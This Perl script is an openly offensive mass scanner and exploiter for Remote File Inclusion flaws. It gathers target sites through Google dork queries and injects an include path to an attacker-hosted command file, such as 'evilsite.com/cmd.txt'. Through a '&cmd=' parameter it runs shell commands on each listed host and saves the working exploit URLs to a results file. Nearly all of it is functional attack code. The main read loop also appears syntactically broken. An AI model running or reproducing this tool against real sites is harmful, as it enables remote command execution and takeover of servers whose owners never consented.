#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Coded in perl.
#This program is quite simple, but has quite a few useful tools built in. The basic script requires 2 args,
#cmd and list. These 2 options are all that are needed to run it. Optional tools are the google query tool,
#which returns the urls of a specified search string(dork). The google query tool also has the option -s
#that specifies a string to search each url for, and then saves the url up to and including the string you specified.
#this is very useful if your looking for a vuln piece of software that is normally installed into a standard directory
#like /calogic/ etc. once the urls are stored, the program sends the requests one by one, and returns the results.
#for ease of use and readability, the vulnerable sites are also stored in a text file called results.txt in the
#working dir. For the google search functionality you will need a google web api key which is free, and will
#also need to have SOAP LITE installed along with the google api kit. Remember though that the google
#functionality is only optional.
use Getopt::Std;
use LWP::UserAgent;
use SOAP::Lite;
# Your Google API developer's key.
my $google_key='get your own key';
# Location of the GoogleSearch WSDL file.
my $google_wdsl = "./GoogleSearch.wsdl";
getopts("c:l:d:s:");
$cmd = $opt_c;
$list = $opt_l;
$dork = $opt_d; # google dork
$search = $opt_s; #search string to parse urls
$|++;
$pre = "http://";
#google search query sub-
if($dork){dork();}
top();
if(!$cmd||!$list) { usage(); }
#get user supplied file inclusion path for exploit and get cmd var
print "File Inclusion Path? ie:/cart.php?cart_root=http://evilsite.com/cmd.txt?\n";
$exploit = <>;
print "Remote command variable?. Or hit enter for default(&cmd=)";
$var = <>;
chomp($var);
if(!$var) {$var = "&cmd=";}
print "Working, please wait";
#do while loop here, that searches through the text file and gets the hosts, it sends the request, and recieves and
#stores the data to be displayed after the scan
#declare i for counter
my $i = 0;
open INPUT, "<$list";
while ( )
{
#put send request here dont forget to chomp
$host=$_;
chomp($host);
chomp($exploit);
$browser = LWP::UserAgent->new() or die;
$browser->timeout(10);
$browser->agent( 'Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)' );
#added Echo command before $cmd, that way exploitation can be more easily verified.
$request = HTTP::Request->new(GET =>$pre.$host.$exploit.$var."echo enthrax;".$cmd)
or die "\nCould Not connect\n\n\n";
$response = $browser->request($request);
$contents[$i] = $response->content;
print ".";
#array for host display on results page
$hostarray[$i] = $host;
#increment my counter to display array values
$i += 1;
}
#this area of code displays the results of the scan.
print "\n\n";
# to store the results in a text file
open(RESULTS, ">results.txt");
while($i > 0)
{
$i -= 1;
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
#if statement that checks to see if the echo command was successful, if "enthrax" offset is 0, then vuln!
if (index($contents[$i], "enthrax") == 0){
print "\nResults for host ".$hostarray[$i];
print "\n\n**************Vulnerable**************\n\n";
print "Results of your command:\n";
print substr $contents[$i], 0, 100;####You can change this number to display more text
print "\n\nThe full exploit url is:\n".$hostarray[$i].$exploit.$var.$cmd;
print RESULTS $hostarray[$i]." is vulnerable!!!!!!!!\n";
print RESULTS "The full exploit url is:\n".$hostarray[$i].$exploit.$var.$cmd."\n\n";
} else {
print "\nResults for host ".$hostarray[$i];
print "\nNot Vulnerable. Better luck next time.";
print "\nReceived data for diagnosis:\n";
print substr $contents[$i], 0, 50;####You can change this number to display more text
}
#to make it look more legible
print "\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r";
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\r";
}
close(RESULTS);
sub top()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " Remote File Include Vuln list scanner by L0s3r 4n71_D3f14n7\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}
sub usage()
{
print "script.pl -c -l -d -s \r\n\r\n";
print " - cmd to be executed\r\n";
print " - location of txt file with hosts. Leave off the http://\r\n";
print " - Dork to search for.\n";
print " - String in URL to search for and once its found, it deletes the rest of the url past the string.\n";
exit();
}
sub dork()
{
print "\nPlease wait... Querying Google.";
my $loops = 4;
$pre = "";
# Create a new SOAP::Lite instance, feeding it GoogleSearch.wsdl.
my $google_search = SOAP::Lite->service("file:$google_wdsl");
#save hosts to the text file.
open(MYOUTFILE, ">list.txt");
#loop to circumvent the google 10 search result limit
for (my $offset2 = 0; $offset2 <= ($loops-1)*10; $offset2 += 10)
{
# Query Google.
my $results = $google_search ->
doGoogleSearch(
$google_key, $dork, $offset2, 10, "true", "", "false",
"", "latin1", "latin1"
);
# Loop through the results.
foreach my $result (@{$results->{resultElements}})
{
# this is an if/else that checks if the -s option is passed
$url2 = $result->{URL};
if($search){
$offsets = index($url2, $search);
if($offsets != -1){
$offsets += length $search;
$temp = substr $url2, 0, $offsets;
print MYOUTFILE $temp, "\n";
}
}else{print MYOUTFILE $url2, "\n";}
}
}
close(MYOUTFILE);
print "\nGoogle Search retrieved urls in list.txt- edit if needed then hit enter.\n";
$z = <>;
}